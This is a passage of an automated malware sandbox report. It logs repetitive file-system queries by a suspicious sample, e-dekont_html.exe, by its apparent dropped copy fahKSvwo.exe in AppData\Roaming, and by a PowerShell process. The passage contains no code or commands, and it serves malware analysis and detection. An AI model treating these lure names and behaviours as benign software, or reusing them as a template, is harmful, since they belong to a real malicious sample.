                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Users\user\AppData\Roaming\fahKSvwo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Users\user\AppData\Roaming\fahKSvwo.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
